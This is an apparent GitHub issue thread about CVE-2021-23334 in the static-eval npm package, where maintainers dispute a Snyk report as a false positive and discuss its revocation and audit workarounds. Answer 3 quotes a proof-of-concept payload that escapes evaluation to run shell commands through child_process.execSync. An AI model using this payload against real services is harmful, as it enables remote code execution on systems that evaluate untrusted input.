High Severity Security vulnerability with package

Question

High Severity Security vulnerability with package

charlieTheBotDev opened this issue 4 years ago · 20 comments

charlieTheBotDev commented 4 years ago

Issue picked up and reported in Snyk: https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765

Answer 1 · 2021-02-17T15:21:27.000Z

@goto-bus-stop can it be fixed? Thanks!

Answer 2 · 2021-02-17T15:43:14.000Z

It's a false positive.

Answer 3 · 2021-02-17T16:52:32.000Z

Could you elaborate on that a bit? Snyk have a PoC at https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 ...

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src="(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()"
var ast = parse(src).body[0].expression;
evaluate(ast)

... and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 has been raised for it

Answer 4 · 2021-02-17T16:57:29.000Z

I see, I thought it was the same as this: 418sec/huntr#1883. That PR had omitted the quotes.

It looks like the snyk one is more valid, but still, essentially expected behaviour as documented in our readme. https://github.com/browserify/static-eval#security

Answer 5 · 2021-02-23T19:25:04.000Z

This issue is also in NVD-CVE-2021-23334.
It’s giving some hard times to other libraries, in my case, pdfmake, it’s a high vulnerability issue reported by npm and it’s being blocked by systems that handle this type of package.

Any workaround that we can use or possibly for a solution?

Answer 6 · 2021-02-23T19:33:01.000Z

i emailed snyk and they said they would revoke the CVE. i'm not sure how that works, so it might take a few days.

Answer 7 · 2021-03-28T18:21:47.000Z

Any more info about the CVE revoke?

Answer 8 · 2021-03-28T18:25:16.000Z

Is already revoked. WhiteSource at least doesn't show it as CVE anymore.

Answer 9 · 2021-03-28T18:58:14.000Z

@SymbioticKilla But I guess it was not officially asked for REJECT to the assigning CNA? According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 the assigning CNA was "Snyk", so if the issue turns out to be a non-security issue and the CVE invalid the respective CNA would need to reject the entry.

Answer 10 · 2021-04-20T07:22:32.000Z

Do we have any update?

Answer 11 · 2021-04-29T13:10:16.000Z

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860

Snyk has updated their own system reflecting that this was deemed not an issue. However, it has yet to get up to the CVE database to get revoked/amended. I just tweeted at Snyk to see how long that process normally takes. I doubt I'll hear anything, but... Best way to seem to get in touch with something like this.

Answer 12 · 2021-04-29T16:30:32.000Z

Hey @Garbee, thanks for raising this issue, yep i agree, anything going into evaluate should not be trusted and is not the responsibility of the maintainer sanitise user input. This was added by Snyk by mistake, apologies for the spam. I will revoke the CVE and mark any Snyk references as False positive. (Expect this change in the next 24 hours)

Answer 13 · 2021-04-30T13:28:23.000Z

Doesn't look like the CVE database maintainers poll updates to existing issues that are revoked unfortunately :(

I sent a report last month for the CVE database and didn't hear back. maybe someone else will be luckier.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334
you will need to post a request here asking for a CVE update and then asking the CVE to be revoked.
https://cveform.mitre.org/

Answer 14 · 2021-06-24T08:56:21.000Z

Hey, after contacting MITRE through multiple channels, CVE-2021-23334 has been marked as rejected/revoked. Hope this helps. This issue can be closed

Answer 15 · 2021-10-07T13:21:55.000Z

npm audit from today =(

Critical Withdrawn: Arbitrary Code Execution in static-eval

Package static-eval

Patched in No patch available

Dependency of @amcharts/amcharts4

Path @amcharts/amcharts4 > pdfmake > svg-to-pdfkit > pdfkit >
linebreak > brfs > static-module > static-eval

Answer 16 · 2021-10-07T21:56:00.000Z

npm audit from today =(

Critical Withdrawn: Arbitrary Code Execution in static-eval

Package static-eval

Patched in No patch available

Dependency of @amcharts/amcharts4

Path @amcharts/amcharts4 > pdfmake > svg-to-pdfkit > pdfkit > linebreak > brfs > static-module > static-eval

Same problem here =(

Answer 17 · 2021-10-08T00:50:48.000Z

For those commenting about failing npm/yarn audits suddenly today, I suspect this has to do with the background change to the npm advisories database which now points to the github advisories db: https://github.blog/2021-10-07-github-advisory-database-now-powers-npm-audit/

Not sure what to do with this info yet but an fyi @leonardomaier @SymbioticKilla

Answer 18 · 2021-10-08T02:44:11.000Z

npm audit from today =(

Critical Withdrawn: Arbitrary Code Execution in static-eval

Package static-eval

Patched in No patch available

Dependency of @amcharts/amcharts4

Path @amcharts/amcharts4 > pdfmake > svg-to-pdfkit > pdfkit > linebreak > brfs > static-module > static-eval

Same issue here also. Any update?

Answer 19 · 2021-10-08T07:21:53.000Z

this package is very stable and the only maintenance effort is in dealing with bogus security warnings. idk why npm doesn't just allow you to silence warnings that are clearly bullshit instead of forcing us to do useless work. i guess i'll email them about this one…

Answer 20 · 2022-05-26T07:14:24.000Z

for folks who use auditjs: use whitelisting

just add a file auditjs.json to your folder, where you run auditjs command with the following content:
{ "ignore": [ { "id": "CVE-2021-23334", "reason": "any reason you want" } ] }
run audit command: npx auditjs ossi --whitelist /path/to/file/auditjs.json